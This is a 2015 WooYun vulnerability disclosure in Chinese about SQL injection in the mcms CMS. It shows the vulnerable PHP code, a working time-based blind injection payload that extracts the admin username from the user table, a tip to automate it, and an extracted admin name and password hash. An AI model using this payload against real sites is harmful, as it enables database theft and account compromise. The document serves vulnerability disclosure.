当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107386

漏洞标题:mcms最新版SQL注入二枚打包(可出任意数据)

相关厂商:mcms.cc

漏洞作者: 路人甲

提交时间:2015-04-20 15:43

修复时间:2015-07-24 15:45

公开时间:2015-07-24 15:45

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-25: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

mcms最新版SQL注入二枚打包(可出任意数据)

详细说明:

掌易科技的程序员反应相当快啊,确认漏洞当天就修复以后出新版本了,前面在wooyun提的几个漏洞新版的mcms做了相应的处理,发布了新版v_3.1.3.enterprise,再来研究研究。
注入一枚:/app/public/code.php?code_id=6977&txt=test&value=test(注意public文件夹是安装系统时取的名字)post中有两个参数,都存在过滤不严的问题。
Txt和value都存在注入问题,这里我们以txt为例来证明问题的存在。我们看看是如何注入的。
/app/public/code.php

function m__list(){
global $dbm,$result,$p,$C,$code_id,$T;
$code_id=isset($_GET['code_id'])?intval($_GET['code_id']):0;//当前分类ID
$_GET['txt']=isset($_GET['txt'])?trim($_GET['txt']):'';
$_GET['value']=isset($_GET['value'])?trim($_GET['value']):'';
$params = array();
//位置导航
$result['snav']=array();
if($code_id>0){
$result['snav']=$T->tree_father($code_id);
}
if(isset($_GET['code_id'])){
$where = " parent_code_id='$code_id' ";
}else{
if($_GET['txt']=='' && $_GET['value']==''){
$where = " parent_code_id=0 ";
}else{
$where = " 1=1 ";
}
}

if($_GET['txt']!='') $where.=" and txt like '%{$_GET['txt']}%'";

if($_GET['value']!='') $where.=" and value like '%{$_GET['value']}%'";
$sql="select * from ".TB_PRE."code where $where order by corder asc";
$rs=$dbm->query($sql);
$result['list']=$rs['list'];
}


由于该cms没有使用自定义的sqlxss()过滤,存在注入。
Payload:GET提交

/app/public/code.php?code_id=6977&txt=%'/**/and(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))%23&value=


因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,不延迟,如下图

错误副本.jpg


若正确,延迟,如下图

成功副本.jpg


按上面的方法依次做下去(burp intruder或者自己写个脚本跑),可测试管理员用户名为:mcmsadmin,密码为: f6fdffe48c908deb0f4c3bd36c032e72

漏洞证明:

见 详细说明

修复方案:

sqlxss()

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-24 15:45

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无